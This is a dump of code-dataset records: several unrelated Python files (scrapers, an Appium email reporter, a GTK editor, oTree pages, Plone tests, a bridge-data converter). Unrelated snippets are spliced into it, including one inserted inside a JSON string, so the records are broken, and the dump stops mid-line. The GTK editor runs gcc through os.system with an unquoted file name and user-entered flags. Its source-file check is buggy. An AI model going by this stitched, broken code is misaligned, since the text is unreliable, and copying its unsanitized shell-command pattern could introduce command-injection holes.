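n1, n2 = int((y == 1).sum()), int((y == 0).sum())
d1, d2 = X[y == 1] - mu1, X[y == 0] - mu2
cov = (d1.T @ d1 + d2.T @ d2) / len(X)       # shared (pooled) covariance

w = np.linalg.solve(cov, mu1 - mu2)          # no explicit inverse needed
b = (-0.5 * mu1 @ np.linalg.solve(cov, mu1)
     + 0.5 * mu2 @ np.linalg.solve(cov, mu2)
     + np.log(n1 / n2))
print(w.shape, round(float(b), 4))
# ----------------------------------------------------------------------------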
homes_table.find_all('tr')[1:]:\n # cells = row.find_all(['td'])\n try:\n facility_type = row.find('th').text\n total_cases_count = int(row.find('td').text.strip().replace(',', ''))\n print(facility_type, total_cases_count)\n if total_cases_count:\n record = {\n 'date': f['scrape_date'],\n 'facility_type': facility_type,\n 'total_cases_count': total_cases_count\n }\n\n records.append(record)\n # if total_new_deaths:\n # death_pct = round(new_death_count / total_new_deaths, 4)\n # else:\n # death_pct = None\n # record = {\n # 'date': f['scrape_date'],\n # 'facility_type': facility_type,\n # 'death_count': new_death_count,\n # 'death_pct': death_pct\n # }\n #\n # records.append(record)\n except:\n raise\n print('Error for {}'.format(f['scrape_date']))\n pass\n\n df = pd.DataFrame(records)\n # print(df.head())\n\n df.to_csv('covid_scraper/exports/total_cases_by_residence_type.csv', index=False)\n","sub_path":"stats/management/commands/aux__get_cached_ltc_cases.py","file_name":"aux__get_cached_ltc_cases.py","file_ext":"py","file_size_in_byte":3389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"159487791","text":"\nimport os\nimport time\nimport smtplib\nfrom email.header import Header\nfrom email.mime.text import MIMEText\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.application import MIMEApplication\n\nfrom com.qa.automation.appium.configs import constants\n\n\nclass MonkeyHandle(object):\n def __init__(self, deviceType):\n\n if deviceType == 'android':\n from com.qa.automation.appium.configs.androidConfig import appVersion, phoneVersion, buildVersion, deviceID\n elif deviceType == 'ios':\n from com.qa.automation.appium.configs.iosConfig import appVersion, phoneVersion, buildVersion, deviceID\n else:\n raise\n\n self.appVersion = appVersion\n self.phoneVersion = phoneVersion\n self.buildVersion = buildVersion\n self.deviceID = deviceID\n\n self.startTime = ''\n self.endTime = ''\n\n self.resultMonkey = ''\n self.resultTraffic = ''\n\n self.fileNameMoneky = 'Android_monkey.log'\n self.fileNameTraffic = 'Traffic_performance.txt'\n\n def handle(self, startTime, endTime, reportPath):\n try:\n self.startTime = startTime\n self.endTime = endTime\n monkeyFilePath = os.path.join(reportPath, self.fileNameMoneky)\n trafficFilePath = os.path.join(reportPath, self.fileNameTraffic)\n if (os.path.exists(monkeyFilePath) and os.path.exists(trafficFilePath)):\n self.monkeyHandle(monkeyFilePath)\n self.trafficHandle(trafficFilePath)\n\n return self.generateReport()\n\n except Exception as e:\n print(str(e))\n\n def trafficHandle(self, filePath):\n try:\n if (filePath != ''):\n performanceData = []\n htmlContent = ''\n dataFile = open(filePath, mode='r', encoding='utf-8')\n allLines = dataFile.readlines()\n for line in allLines:\n performanceData.append(line)\n for line in performanceData:\n value = str(line).split(':')\n if (len(value) > 1):\n htmlContent = \"%s%s\" % (str(value[0]) + 's', str(value[1]) + 'Mb')\n self.resultTraffic = htmlContent\n except Exception as e:\n print(str(e))\n finally:\n dataFile.close()\n\n def monkeyHandle(self, filePath):\n try:\n if os.path.exists(filePath):\n monkeyData = self.dataHandle(filePath)\n exception = ''\n exception_list = {'空指针异常': 0,\n 'debug异常': 0,\n '低内存异常': 0,\n '操作无响应异常': 0,\n '其他异常': 0}\n for line in monkeyData:\n if 'NullPointerException' in line:\n exception = u'空指针异常'\n elif 'IllegalStateException' in line:\n exception = u'debug异常'\n elif 'OutOfMemoryError' in line:\n exception = 
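# ----------------------------------------------------------------------------
# The scraper above walks <tr>/<th>/<td> tags by hand. For uniform tables,
# pandas.read_html parses the same markup into a DataFrame in one call
# (it requires an HTML parser such as lxml or html5lib to be installed):
from io import StringIO
import pandas as pd

html = """
<table id="restable">
  <tr><th>Residence type</th><th>Cases</th></tr>
  <tr><th>Private residence</th><td>1,234</td></tr>
  <tr><th>Long-term care</th><td>567</td></tr>
</table>
"""
df = pd.read_html(StringIO(html), thousands=",")[0]  # list of tables; take first
print(df)
# ----------------------------------------------------------------------------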
u'低内存异常'\n elif 'NOT RESPONDING' in line:\n exception = u'操作无响应异常'\n if line == '\\n':\n if exception == '':\n exception = u'其他异常'\n exception_list[exception] = exception_list[exception] + 1\n\n avgRowContent = ''\n for key, value in exception_list.items():\n avgRowContent = avgRowContent + \"%s%s\" % (\n key, value)\n self.resultMonkey = avgRowContent\n except Exception as e:\n print(str(e))\n\n def dataHandle(self, filePath):\n monkeyData = []\n inseartValue = False\n dataFile = open(filePath, mode='r', encoding='utf-8')\n try:\n allLines = dataFile.readlines()\n for line in allLines:\n if line.startswith('// CRASH') or line.startswith('// NOT RESPONDING') or inseartValue == True:\n inseartValue = True\n if line == '\\n':\n continue\n monkeyData.append(line)\n if line.startswith('**'):\n inseartValue = False\n monkeyData.append('\\n')\n except Exception as e:\n raise\n finally:\n dataFile.close()\n\n return monkeyData\n\n def generateReport(self):\n try:\n templateHtml = self.loadHtmlTemplate()\n startTime = self.startTime\n endTime = self.endTime\n trafficResult = self.resultTraffic\n resultMonkey = self.resultMonkey\n\n templateHtml = templateHtml % (self.phoneVersion, self.deviceID, self.buildVersion, self.appVersion, startTime, endTime, trafficResult, resultMonkey)\n\n return templateHtml\n except Exception as e:\n print(str(e))\n\n def loadHtmlTemplate(self):\n resourcesDirectory = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) + \"/resources/\"\n file = os.path.join(resourcesDirectory, 'templateMailMonkey.html')\n templateFile = open(file, encoding='utf-8')\n try:\n contents = templateFile.read()\n except Exception as e:\n raise\n finally:\n templateFile.close()\n return str(contents)\n\ndef sendTestResultMail(startTime, endTime, reportPath, deviceType):\n fromAddress = constants.Email.mailAddress\n toAddress = constants.Email.monkeyMaillAddress\n smtpServer = constants.Email.smtpServer\n smtpUser = constants.Email.username\n smtpPassword = constants.Email.password\n smtpPort = constants.Email.smtpPort\n\n attachmentFiles = []\n\n if deviceType == 'android':\n logcatFile = 'Android_monkey_logcat.log'\n reportFile = 'test_monkey_result.html'\n attachmentFiles.append(logcatFile)\n attachmentFiles.append(reportFile)\n elif deviceType == 'ios':\n pass\n # file = 'test_monkey_result.html'\n # reportFile = os.path.join(reportPath, 'feifan_automation_test_report_ios.html')\n else:\n raise\n\n mailBodyContents = MonkeyHandle(deviceType).handle(startTime, endTime, reportPath)\n msg = MIMEMultipart('related')\n\n body = MIMEText(mailBodyContents, 'html', 'utf-8')\n msg.attach(body)\n\n for file in attachmentFiles:\n filePath = os.path.join(reportPath, file)\n if os.path.exists(filePath):\n attach = MIMEApplication(open(filePath, 'rb').read())\n attach.add_header('Content-Disposition', 'attachment', filename=file)\n msg.attach(attach)\n\n if deviceType == 'android':\n msg['Subject'] = Header(constants.MONKEY_HEADR_NAME % (deviceType.capitalize(), time.strftime('%Y-%m-%d')), \"utf-8\")\n elif deviceType == 'ios':\n msg['Subject'] = Header(constants.MONKEY_HEADR_NAME % ('IOS', time.strftime('%Y-%m-%d')), \"utf-8\")\n else:\n raise\n msg['From'] = (r\"%s <\" + fromAddress + \">\") % Header(constants.SYSTEM_NAME, \"utf-8\")\n msg['To'] = ';'.join(toAddress)\n\n s = smtplib.SMTP(smtpServer, smtpPort)\n s.ehlo()\n s.starttls()\n s.login(smtpUser, smtpPassword)\n s.sendmail(fromAddress, toAddress, msg.as_string())\n s.quit()\n\n\nif __name__ == \"__main__\":\n reportPath = 
'/Users/songbo/workspace/autotest/monkey/android_monkey_log'\n sendTestResultMail('2016/10/20 03:01:00', '2016/10/20 07:06:05', reportPath, 'android')\n","sub_path":"AutoFrameworkForAppiumPy/com/qa/automation/appium/utility/monkeyMailProcess.py","file_name":"monkeyMailProcess.py","file_ext":"py","file_size_in_byte":7731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"331523849","text":"#!/usr/bin/python\n\nimport gi, sys, os, pyedsettings, time\ngi.require_version('Gtk','3.0')\nfrom gi.repository import Gtk, Gdk, GtkSource\nfrom ConfigParser import SafeConfigParser\n\nclass editor(Gtk.Window):\n\t\"\"\"docstring for editor\"\"\"\n\tdef __init__(self, args):\n\t\tsuper(editor, self).__init__()\n\n\t\t#__# Global Variables and Settings #__#\n\t\tself.firstTime = True\n\t\tself.saved = False\n\t\tself.darkMode = False\n\t\tself.openLastFile = False\n\t\tself.showLines = False\n\t\tself.highlightCurrentLine = False\n\t\tself.highlightMatchingBrackets = False\n\t\tself.autoComplete = False\n\n\t\tself.config = SafeConfigParser()\n\t\tself.readConfig(self)\n\t\t#__#__#__#\n\n\t\tself.args = args\n\t\tprint(self.args)\n\t\tself.connect('destroy', Gtk.main_quit)\n\n\t\tself.set_default_size(1200, 600)\n\n\t\tself.set_title(\"Py Editor\")\n\n\t\tself.openedFile = False\n\t\tself.current = 0\n\n\t\tself.hb = Gtk.HeaderBar()\n\t\tself.hb.set_show_close_button(True)\n\t\tself._hb = Gtk.HBox(spacing=6)\n\n\t\ta = Gtk.Button.new_from_icon_name(\"document-open\", Gtk.IconSize.SMALL_TOOLBAR)\n\t\ta.connect('clicked', self.open, \"\")\n\t\tb = Gtk.Button.new_from_icon_name(\"document-save\", Gtk.IconSize.SMALL_TOOLBAR)\n\n\t\tself._hb.pack_start(a, False, False, 0)\n\t\tself._hb.pack_start(b, False, False, 0)\n\n\t\tself.hb.add(self._hb)\n\n\t\tself.set_titlebar(self.hb)\n\n\t\tself.tabs = Gtk.Notebook()\n\t\tself.tabs.connect('focus-tab', self.changeTitle)\n\t\tself.tabLabels = []\n\n\t\tself.lm = GtkSource.LanguageManager()\n\t\tself.textEditor = []\n\t\tself.textBuffer = []\n\t\tself._filePath = []\n\n\t\t\"\"\"self.textEditor.append(GtkSource.View())\n\t\tself.textBuffer.append(GtkSource.Buffer())\n\t\tself.textEditor[self.current].set_buffer(self.textBuffer[self.current])\n\t\tself.textEditor[self.current].do_show_completion(self.textEditor[self.current])\"\"\"\n\n\t\t#__#\n\n\t\t#self._scrollBar = Gtk.ScrolledWindow()\n\t\t#self._scrollBar.add(self.textEditor[self.current])\n\t\t#self.tabs.append_tab()\n\t\t#self.add(self._scrollBar)\n\n\t\taccel = Gtk.AccelGroup()\n\t\taccel.connect(Gdk.keyval_from_name('S'), Gdk.ModifierType.CONTROL_MASK, 0, self.save)\n\t\tself.add_accel_group(accel)\n\n\t\taccel = Gtk.AccelGroup()\n\t\taccel.connect(Gdk.keyval_from_name('O'), Gdk.ModifierType.CONTROL_MASK, 0, self.open)\n\t\tself.add_accel_group(accel)\n\n\t\taccel = Gtk.AccelGroup()\n\t\taccel.connect(Gdk.keyval_from_name('N'), Gdk.ModifierType.CONTROL_MASK, 0, self.newTab)\n\t\tself.add_accel_group(accel)\n\n\t\taccel = Gtk.AccelGroup()\n\t\taccel.connect(Gdk.keyval_from_name('P'), Gdk.ModifierType.CONTROL_MASK, 0, self.openSettings)\n\t\tself.add_accel_group(accel)\n\n\t\taccel = Gtk.AccelGroup()\n\t\taccel.connect(Gdk.keyval_from_name('R'), Gdk.ModifierType.CONTROL_MASK, 0, self._run)\n\t\tself.add_accel_group(accel)\n\n\t\t#__#\n\n\t\t\"\"\"if len(self.args) >= 2:\n\t\t\tfor i in xrange(1, len(self.args)):\n\t\t\t\tprint(\"tried to open \" + 
self.args[i])\n\t\t\t\tself.open(self.args[i])\n\t\telse:\n\t\t\tself.set_title(\"PyEditor\")\"\"\"\n\n\t\tself.add(self.tabs)\n\t\tself.show_all()\n\t\tself.newTab(self)\n\n\tdef changeTitle(self, *args):\n\t\tself.set_title(\"Py Editor @ \" + self.tabLabels[self.tabs.get_current_page()].get_text())\n\n\tdef newTab(self, *args):\n\t\tp = Gtk.ScrolledWindow()\n\t\tself.textEditor.append(GtkSource.View())\n\t\tself.textBuffer.append(GtkSource.Buffer())\n\t\tself.textEditor[self.current].set_buffer(self.textBuffer[self.current])\n\n\t\t#__# Settings #__#\n\n\t\tself.textEditor[self.current].set_show_line_numbers(self.showLines)\n\t\tself.textEditor[self.current].set_highlight_current_line(self.highlightCurrentLine)\n\n\t\t#__#__#__#\n\t\tp.add(self.textEditor[self.current])\n\t\tp.show_all()\n\t\tl = Gtk.Label(\"New Tab\")\n\t\tself.tabs.append_page(p, l)\n\t\tself.tabLabels.append(l)\n\t\tself.tabs.show_all()\n\t\tself.tabs.set_current_page(self.current)\n\t\tself.current += 1\n\n\tdef save(self, *args):\n\t\t\"\"\"Write the buffer of the currently visible tab back to its file.\"\"\"\n\t\tpage = self.tabs.get_current_page()\t# self.current already points past the active tab\n\t\tsiter = self.textBuffer[page].get_start_iter()\n\t\teiter = self.textBuffer[page].get_end_iter()\n\t\ttext = self.textBuffer[page].get_text(siter, eiter, False)\n\t\tfile = open(self._filePath[page], 'w')\n\t\tfile.write(text)\n\t\tfile.close()\n\n\n\tdef open(self, __file, *args):\n\t\t\"\"\"Ask for a file and load it into a new tab.\"\"\"\n\t\tdialog = Gtk.FileChooserDialog(\"Open File\", self, Gtk.FileChooserAction.OPEN, (Gtk.STOCK_CANCEL, Gtk.ResponseType.CANCEL,Gtk.STOCK_OPEN, Gtk.ResponseType.OK))\n\t\tresponse = dialog.run()\n\t\tif response == Gtk.ResponseType.OK:\n\t\t\t_file = open(dialog.get_filename())\n\t\t\ttext = _file.read()\n\t\t\t_file.close()\n\t\t\tself.openedFile = True\n\t\t\tself.newTab(self)\n\t\t\tself.textBuffer[self.current - 1].set_text(text)\n\t\t\tlanguage = self.lm.guess_language(dialog.get_filename())\n\t\t\tif language:\n\t\t\t\tprint (language.get_name())\n\t\t\t\tself.textBuffer[self.current - 1].set_highlight_syntax(True)\n\t\t\t\tself.textBuffer[self.current - 1].set_language(language)\n\t\t\tself._filePath.append(dialog.get_filename())\n\t\t\tself.tabLabels[self.current - 1].set_text(os.path.basename(dialog.get_filename()))\n\t\t\tself.set_title(\"Py Editor @ \" + self.tabLabels[self.tabs.get_current_page()].get_text())\n\t\tdialog.destroy()\n\t\t\"\"\"\t# this is supposed to open a file received via argument e.g.: self.open(\"file.txt\") (not working)\n\t\t\t_file = open(__file)\n\t\t\ttext = _file.read()\n\t\t\t_file.close()\n\t\t\tself.openedFile = True\n\t\t\tself.textBuffer[self.current].set_text(text)\n\t\t\tlanguage = self.lm.guess_language(__file)\n\t\t\tif language:\n\t\t\t\tself.textBuffer[self.current].set_highlight_syntax(True)\n\t\t\t\tself.textBuffer[self.current].set_language(language)\n\t\t\tself._filePath.append(__file)\n\t\t\tself.set_title(\"Py Editor @ \" + __file)\"\"\"\n\n\tdef readConfig(self, *args):\n\t\tself.config.read(\"config.ini\")\n\t\tif not os.path.isfile(\"config.ini\"):\n\t\t\tif 'preferences' not in self.config.sections():\n\t\t\t\tself.config.add_section('preferences')\n\t\t\tself.config.set('preferences', 'darkMode', 'False')\n\t\t\tself.config.set('preferences', 'highlightMatchingBrackets', 'False')\n\t\t\tself.config.set('preferences', 'highlightCurrentLine', 'False')\n\t\t\tself.config.set('preferences', 'showLines', 'False')\n\t\t\tself.config.set('preferences', 'autoComplete', 'False')\n\t\t\twith open(\"config.ini\", \"w+\") as 
_file:\n\t\t\t\tself.config.write(_file)\n\n\t\tself.darkMode = self.toBool(self.config.get('preferences', 'darkMode'))\n\t\tself.highlightMatchingBrackets = self.toBool(self.config.get('preferences', 'highlightMatchingBrackets'))\n\t\tself.highlightCurrentLine = self.toBool(self.config.get('preferences', 'highlightCurrentLine'))\n\t\tself.showLines = self.toBool(self.config.get('preferences', 'showLines'))\n\t\tself.autoComplete = self.toBool(self.config.get('preferences', 'autoComplete'))\n\n\tdef applySettings(self, *args):\n\t\t#print(\"hello world\")\n\t\tfor i in xrange(0, len(self.textEditor)):\n\t\t\tself.textEditor[i].set_show_line_numbers(self.showLines)\n\t\t\tself.tabs.show_all()\n\t\t\t#self.textEditor[i].set_highlight_matching_brackets(self.highlightMatchingBrackets)\n\t\tGtk.main_iteration()\n\n\tdef openSettings(self, *args):\n\t\t_setWindow = pyedsettings.settingsWindow()\n\t\t_setWindow.connect('destroy', self.applySettings)\n\n\tdef _run(self, *args):\n\t\t_filename = self.tabLabels[self.tabs.get_current_page()].get_text()\n\t\tnoExtension = _filename.split(\".\")[0]\n\t\tif \"c\" in _filename:\n\t\t\tflags = \"\"\n\t\t\tdialog = Gtk.Dialog(\"Compiler flags\", self, 0,(Gtk.STOCK_CANCEL, Gtk.ResponseType.CANCEL,Gtk.STOCK_OK, Gtk.ResponseType.OK))\n\t\t\tarea = dialog.get_content_area()\n\t\t\tentry = Gtk.Entry()\n\t\t\tarea.add(entry)\n\t\t\tarea.show_all()\n\t\t\tresponse = dialog.run()\n\t\t\tdialog.destroy()\n\t\t\tif response == Gtk.ResponseType.OK:\n\t\t\t\tflags = entry.get_text()\n\t\t\t\tos.system(\"gcc -c \" + _filename + \" \" + flags)\n\t\t\t\tos.system(\"gcc \" + noExtension + \".o -o \" + noExtension + \" \" + flags)\n\t\t\t\tos.system(\"xterm -hold -e ./\" + noExtension)\n\n\tdef toBool(self, _string):\n\t\tif _string == \"True\":\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\n_tmp = \"\"\nif len(sys.argv) >= 1:\n\twindow = editor(sys.argv)\n\twindow.show_all()\nelse:\n\twindow = editor(_tmp)\n\twindow.show_all()\n\nGtk.main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"454319620","text":"import requests\nfrom bs4 import BeautifulSoup\n\nfrom congressional_data.constants import PARTY_ABBREVIATIONS\nfrom congressional_data.data_filling.utils.utils import (\n extract_tags,\n get_correct_url,\n get_wiki_article_name,\n ignored,\n init_session,\n parse_date,\n tags_to_text,\n)\nfrom congressional_data.models import PartyAbbreviation, PoliticalParty, get_or_create, get_or_create_with_created\n\n\ndef populate_parties(session):\n for abbrev, party_url in PARTY_ABBREVIATIONS.items():\n get_or_create_political_party(session, party_url, abbrev)\n session.commit()\n\n\ndef get_founded_date(soup):\n founded_date = parse_party_date(soup, 'Founded')\n return founded_date\n\n\ndef get_dissolved_date(soup):\n dissolved_date = parse_party_date(soup, 'Dissolved')\n return dissolved_date\n\n\ndef parse_party_date(soup, date_name):\n parsed_date, party_date_tag = None, None\n with ignored(AttributeError):\n infobox = soup.find('table', attrs={'class': 'infobox'})\n party_date_tag = infobox.find('th', text=date_name).next_sibling\n if party_date_tag:\n try:\n party_date = party_date_tag.find('span', attrs={'class': 'bday'}).text\n except AttributeError:\n extract_tags(party_date_tag.find_all('span'))\n party_date = tags_to_text(party_date_tag.contents).split(';')[0].split('[')[0]\n if party_date:\n with ignored(ValueError):\n 
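# parse_date raises ValueError on formats it cannot parse; ignored() suppresses it\n                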
parsed_date = parse_date(party_date)\n    print('{}: {}'.format(date_name, parsed_date))\n    return parsed_date\n\n\ndef update_political_party(party):\n    if party.url and not party.name:\n        print('Scraping party data from {}'.format(party.url))\n        founded_date, dissolved_date, name = scrape_political_party(party.url)\n        if not party.name and name:\n            party.name = name\n        if founded_date:\n            party.founded = founded_date\n        if dissolved_date:\n            party.dissolved = dissolved_date\n    if not party.founded:\n        party.founded = parse_date('0001-01-01')\n    if not party.dissolved:\n        party.dissolved = parse_date('9999-01-01')\n\n\ndef scrape_political_party(url):\n    page = requests.get(url)\n    soup = BeautifulSoup(page.content, 'lxml')\n    name_tag = soup.find('span', attrs={'class': 'fn org'})\n    if not name_tag:\n        name_tag = get_wiki_article_name(soup)\n    founded_date = get_founded_date(soup)\n    dissolved_date = get_dissolved_date(soup)\n    return founded_date, dissolved_date, tags_to_text(name_tag)\n\n\ndef get_or_create_political_party(session, party_link, abbreviation=None):\n    party, created = get_or_create_with_created(session, PoliticalParty, url=get_correct_url(session, party_link))\n    if abbreviation:\n        get_or_create(session, PartyAbbreviation, abbreviation=abbreviation, party_id=party.id)\n    if created:\n        update_political_party(party)\n    return party.id\n\n\ndef update_parties(session):\n    for party in session.query(PoliticalParty).filter(PoliticalParty.name.is_(None)):\n        update_political_party(party)\n    session.commit()\n\n\nif __name__ == '__main__':\n    session = init_session()\n    # fix_professions()\n    populate_parties(session)\n    update_parties(session)\n    session.close()\n","sub_path":"data_filling/parties.py","file_name":"parties.py","file_ext":"py","file_size_in_byte":3261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"91169688","text":"from plone.app.testing import PloneSandboxLayer\nfrom plone.app.testing import applyProfile\nfrom plone.app.testing import PLONE_FIXTURE\nfrom plone.app.testing import IntegrationTesting\nfrom plone.app.testing import FunctionalTesting\n\nfrom plone.testing import z2\n\nfrom zope.configuration import xmlconfig\n\n\nclass ProyectopolicyLayer(PloneSandboxLayer):\n\n    defaultBases = (PLONE_FIXTURE,)\n\n    def setUpZope(self, app, configurationContext):\n        # Load ZCML\n        import proyecto.policy\n        xmlconfig.file(\n            'configure.zcml',\n            proyecto.policy,\n            context=configurationContext\n        )\n\n        # Install products that use an old-style initialize() function\n        #z2.installProduct(app, 'Products.PloneFormGen')\n\n#    def tearDownZope(self, app):\n#        # Uninstall products installed above\n#        z2.uninstallProduct(app, 'Products.PloneFormGen')\n\n    def setUpPloneSite(self, portal):\n        applyProfile(portal, 'proyecto.policy:default')\n\nPROYECTO_POLICY_FIXTURE = ProyectopolicyLayer()\nPROYECTO_POLICY_INTEGRATION_TESTING = IntegrationTesting(\n    bases=(PROYECTO_POLICY_FIXTURE,),\n    name=\"ProyectopolicyLayer:Integration\"\n)\nPROYECTO_POLICY_FUNCTIONAL_TESTING = FunctionalTesting(\n    bases=(PROYECTO_POLICY_FIXTURE, z2.ZSERVER_FIXTURE),\n    name=\"ProyectopolicyLayer:Functional\"\n)\n","sub_path":"src/proyecto.policy/src/proyecto/policy/testing.py","file_name":"testing.py","file_ext":"py","file_size_in_byte":1338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"461199877","text":"from otree.api import Currency as c, currency_range\nfrom ._builtin import Page, WaitPage\nfrom .models import Constants\n\nclass 
Instruction(Page):\n def vars_for_template(self):\n return dict(\n pay_inattent=Constants.pay_inattention\n )\n\nclass Instructions(Page):\n pass\n\nclass Instructions2(Page):\n pass\n\nclass Popup(Page):\n pass\n\nclass DemoIntro(Page):\n pass\n\nclass Type(Page):\n pass\n\nclass Demo(Page):\n def js_vars(self):\n if self.player.type == 'r1':\n random_draw=Constants.high_example\n lower_bound=Constants.high_ability[0]\n upper_bound=Constants.high_ability[1]\n elif self.player.type == 'r2':\n random_draw=Constants.low_example\n lower_bound=Constants.low_ability[0]\n upper_bound=Constants.low_ability[1]\n return dict(\n random_draw=random_draw,\n animation_time=Constants.animation_time,\n min=lower_bound,\n max=upper_bound,\n )\n\nclass TrueStart(Page):\n pass\n\nclass Task(Page):\n timeout_seconds = Constants.task_timeout\n form_model = 'player'\n form_fields = [\n 'draw_1','draw_2','draw_3','draw_4','draw_5','draw_6',\n 'draw_7','draw_8','draw_9','draw_10','draw_11','draw_12',\n 'draw_13','draw_14','draw_15','draw_16','draw_17','draw_18',\n 'draw_19','draw_20','current_max_is','num_draws','attention_check',\n 'prompt_counter','Task_warnings'\n ]\n def js_vars(self):\n pop_up_start=Constants.pop_up_time\n pop_up_end=(Constants.pop_up_time-Constants.pop_up_duration)\n if self.player.type == 'r1':\n lower_bound=Constants.high_ability[0]\n upper_bound=Constants.high_ability[1]\n elif self.player.type == 'r2':\n lower_bound=Constants.low_ability[0]\n upper_bound=Constants.low_ability[1]\n return dict(\n min=lower_bound,\n max=upper_bound,\n pop_up_start=pop_up_start,\n pop_up_end=pop_up_end,\n animation_time=Constants.animation_time\n )\n\nclass ResultsWaitPage(WaitPage):\n after_all_players_arrive = 'set_payoffs'\n\n\nclass Individual_Results(Page):\n def vars_for_template(self):\n me = self.player\n return dict(\n my_performance=me.current_max_is,\n my_costs=Constants.cost * me.num_draws,\n pay_inattent=Constants.pay_inattention\n )\n\nclass Hypothetical1(Page):\n form_model = 'player'\n form_fields = ['strategy']\n\nclass Hypothetical2(Page):\n form_model = 'player'\n form_fields = ['altcost']\n\n def vars_for_template(self):\n return dict(\n cost=Constants.cost,\n cost_alt=Constants.cost_alt\n )\n\n\nclass Hypothetical3(Page):\n form_model = 'player'\n form_fields = ['altbound']\n\n def vars_for_template(self):\n if self.player.type == 'r1':\n lower_bound=Constants.high_ability[0]\n upper_bound=Constants.high_ability[1]\n lower_alt=Constants.high_ability_alt[0]\n upper_alt=Constants.high_ability_alt[1]\n elif self.player.type == 'r2':\n lower_bound=Constants.low_ability[0]\n upper_bound=Constants.low_ability[1]\n lower_alt=Constants.low_ability_alt[0]\n upper_alt=Constants.low_ability_alt[1]\n return dict(\n min=lower_bound,\n max=upper_bound,\n min_alt=lower_alt,\n max_alt=upper_alt,\n )\n\n\nclass Hypothetical4(Page):\n form_model = 'player'\n form_fields = ['belief']\n\n def vars_for_template(self):\n if self.player.type == 'r1':\n lower_opp=Constants.low_ability[0]\n upper_opp=Constants.low_ability[1]\n elif self.player.type == 'r2':\n lower_opp=Constants.high_ability[0]\n upper_opp=Constants.high_ability[1]\n return dict(\n min_opp=lower_opp,\n max_opp=upper_opp,\n )\n\nclass Hypothetical5(Page):\n form_model = 'player'\n form_fields = ['expectation']\n\nclass Hypothetical6(Page):\n form_model = 'player'\n form_fields = ['ideal']\n\n\nclass Total_Results(Page):\n def vars_for_template(self):\n me = self.player\n opponent = me.get_others_in_group()[0]\n return dict(\n 
my_performance=me.current_max_is,\n my_costs=me.total_costs,\n my_payoff=me.payoff,\n my_payoff_real_money=me.payoff.to_real_world_currency(self.session),\n other_performance=opponent.current_max_is,\n total_performance=me.group.total_performance,\n pay_inattent=Constants.pay_inattention\n )\n\n def is_displayed(self):\n return self.player.group.is_noisy == 0\n\n\nclass Total_Results_Noisy(Page):\n def vars_for_template(self):\n me = self.player\n opponent = me.get_others_in_group()[0]\n return dict(\n my_performance=me.current_max_is,\n my_costs=me.total_costs,\n my_payoff=me.payoff,\n my_payoff_real_money=me.payoff.to_real_world_currency(self.session),\n other_performance=opponent.current_max_is,\n total_performance=me.group.total_performance,\n noise=me.group.noise,\n )\n\n def is_displayed(self):\n return self.player.group.is_noisy == 1\n\n\n\npage_sequence = [\n Instruction,\n# Instructions2,\n# Popup,\n Type,\n DemoIntro,\n Demo,\n TrueStart,\n Task,\n Individual_Results,\n Hypothetical1,\n Hypothetical2,\n Hypothetical3,\n Hypothetical4,\n Hypothetical5,\n Hypothetical6,\n ResultsWaitPage,\n Total_Results,\n Total_Results_Noisy]\n","sub_path":"main_exp_noisy/pages.py","file_name":"pages.py","file_ext":"py","file_size_in_byte":5681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"163424873","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Feb 5 14:09:53 2018\n\n@author: scander.mustapha\n\"\"\"\n\nimport pickle\nimport numpy as np\nimport pandas as pd\nfrom BridgeDeal import BridgeDeal\n\nCARDMAP = {\n 's2': 0, 's3': 1, 's4': 2, 's5': 3, 's6': 4, 's7': 5, 's8': 6, 's9': 7, 'st': 8, 'sj': 9, 'sq': 10, 'sk': 11, 'sa': 12,\n 'h2': 13, 'h3': 14, 'h4': 15, 'h5': 16, 'h6': 17, 'h7': 18, 'h8': 19, 'h9': 20, 'ht': 21, 'hj': 22, 'hq': 23, 'hk': 24, 'ha': 25,\n 'd2': 26, 'd3': 27, 'd4': 28, 'd5': 29, 'd6': 30, 'd7': 31, 'd8': 32, 'd9': 33, 'dt': 34, 'dj': 35, 'dq': 36, 'dk': 37, 'da': 38,\n 'c2': 39, 'c3': 40, 'c4': 41, 'c5': 42, 'c6': 43, 'c7': 44, 'c8': 45, 'c9': 46, 'ct': 47, 'cj': 48, 'cq': 49, 'ck': 50, 'ca': 51\n }\n\ndef convert_deal(deal):\n south = np.where(deal.hands[0])[0]\n west = np.where(deal.hands[1])[0]\n north = np.where(deal.hands[2])[0]\n east = np.where(deal.hands[3])[0]\n bidding = [0 for _ in range(24)]\n bidding[:len(deal.bidding)] = deal.bidding\n bidding = np.array(bidding)\n dealer = deal.dealer\n leader = deal.leader\n lead = CARDMAP[deal.lead.lower()]\n vuln = deal.vuln\n return [*south, *west, *north, *east, *bidding, dealer, leader, lead, vuln]\n\ndef create_dataframe(pickle_name,store_name):\n store = pd.HDFStore(store_name, \"w\", complib=str(\"zlib\"), complevel=5)\n with open(pickle_name, 'rb') as f:\n data = pickle.load(f)\n \n data = [d for d in data if len(d.bidding) < 25]\n d = map(convert_deal, data)\n columns = []\n for hand in ['south', 'west', 'north', 'east']:\n columns.extend(['{1}{0}'.format(i+1, hand) for i in range(13)])\n columns.extend(['bidding{0}'.format(i+1) for i in range(24)])\n columns.extend(['dealer', 'leader', 'lead', 'vuln'])\n \n \n df = pd.DataFrame(list(d), columns=columns, dtype='int32')\n store.put('df', df, data_columns=df.columns)\n store.close()\n","sub_path":"reinforcement_learning/data/dataframe_creator.py","file_name":"dataframe_creator.py","file_ext":"py","file_size_in_byte":1953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"143798287","text":"# Communicating with Benchtop 
